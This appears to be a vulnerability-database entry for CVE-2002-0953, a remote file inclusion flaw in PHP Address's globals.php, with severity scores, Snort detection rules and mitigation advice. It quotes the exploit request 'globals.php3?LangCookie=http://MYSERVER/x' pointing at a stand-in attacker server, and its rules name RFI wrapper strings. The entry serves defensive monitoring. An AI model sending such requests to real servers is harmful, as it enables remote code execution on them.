cbcvebase.
CVE-2002-0953
published 2002-10-04

CVE-2002-0953: globals.php in PHP Address before 0.2f, with the PHP allow_url_fopen and register_globals variables enabled, allows remote attackers to execute arbitrary PHP…

PriorityP267high7.5CVSS 2.0
AVNACLAuNCPIPAP
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
3.78%
88.6th percentile
globals.php in PHP Address before 0.2f, with the PHP allow_url_fopen and register_globals variables enabled, allows remote attackers to execute arbitrary PHP code via a URL to the code in the LangCookie parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
php_addressphp_address

Detection & IOCsextracted from sources · hover to see the quote

path/globals.php3?LangCookie=http://MYSERVER/x
snort
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SERVER PHP Possible data Remote File Inclusion Attempt"; flow:established,to_server; http.uri; content:".php?"; content:"=data|3a|//"; reference:cve,2002-0953; reference:url,diablohorn.wordpress.com/2010/01/16/interesting-local-file-inclusion-method/; classtype:web-application-attack; sid:2013003; rev:5; metadata:created_at 2011_06_10, cve CVE_2002_0953, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_04_20, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
snort
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SERVER PHP Possible https Local File Inclusion Attempt"; flow:established,to_server; http.uri; content:".php?"; content:"=https|3a|//"; reference:cve,2002-0953; reference:url,diablohorn.wordpress.com/2010/01/16/interesting-local-file-inclusion-method/; classtype:web-application-attack; sid:2012998; rev:5; metadata:affected_product Web_Server_Applications, attack_target Server, created_at 2011_06_10, cve CVE_2002_0953, deployment Perimeter, deployment Internal, deployment Datacenter, confidence High, signature_severity Major, tag Local_File_Inclusion, tag Exploit, tag LFI, tag RFI, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_04_20, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
snort
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SERVER PHP Possible ftps Local File Inclusion Attempt"; flow:established,to_server; http.uri; content:".php?"; content:"=ftps|3a|//"; reference:cve,2002-0953; reference:url,diablohorn.wordpress.com/2010/01/16/interesting-local-file-inclusion-method/; classtype:web-application-attack; sid:2013000; rev:5; metadata:affected_product Web_Server_Applications, attack_target Server, created_at 2011_06_10, cve CVE_2002_0953, deployment Perimeter, deployment Internal, deployment Datacenter, confidence High, signature_severity Major, tag Local_File_Inclusion, tag Exploit, tag LFI, tag RFI, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_04_20, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
snort
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SERVER PHP Possible file Remote File Inclusion Attempt"; flow:established,to_server; http.uri; content:".php?"; content:"=file|3a|//"; reference:cve,2002-0953; reference:url,diablohorn.wordpress.com/2010/01/16/interesting-local-file-inclusion-method/; classtype:web-application-attack; sid:2013002; rev:6; metadata:created_at 2011_06_10, cve CVE_2002_0953, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_04_20, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
snort
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SERVER Generic PHP Remote File Include"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"allow_url_include"; http.uri.raw; content:"php|3a 2f 2f|input"; http.request_body; content:"<?php"; fast_pattern; reference:cve,2002-0953; reference:cve,2024-4577; classtype:attempted-user; sid:2019957; rev:6; metadata:affected_product Any, attack_target Server, created_at 2014_12_17, deployment Datacenter, confidence High, signature_severity Major, tag Remote_File_Include, updated_at 2024_06_10, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
  • The vulnerable parameter is `LangCookie` in `globals.php` (also named `globals.php3`). Monitor HTTP requests to this file where `LangCookie` is set to a remote URL (http://, https://, ftp://, ftps://, file://, data://).
  • The exploit targets `globals.php3` (note the `.php3` extension) with the `LangCookie` parameter pointing to an attacker-controlled server. Alert on GET requests to `globals.php3` containing `LangCookie=http://`.
  • Generic PHP RFI via POST: detect requests where the URI contains `allow_url_include` and the raw URI contains `php://input`, with a request body starting with `<?php`. This pattern covers weaponized RFI payloads.
  • Detect RFI attempts using the `data://` wrapper in PHP parameters: look for `.php?` followed by `=data://` in the URI.
  • Detect RFI/LFI attempts using the `file://` wrapper: look for `.php?` followed by `=file://` in the URI.
  • Detect LFI/RFI attempts using the `https://` wrapper: look for `.php?` followed by `=https://` in the URI.
  • Detect LFI/RFI attempts using the `ftps://` wrapper: look for `.php?` followed by `=ftps://` in the URI.
  • ·The vulnerability is only exploitable when BOTH `allow_url_fopen` AND `register_globals` are enabled in the PHP configuration. Disabling either setting mitigates the attack.

CVSS provenance

nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.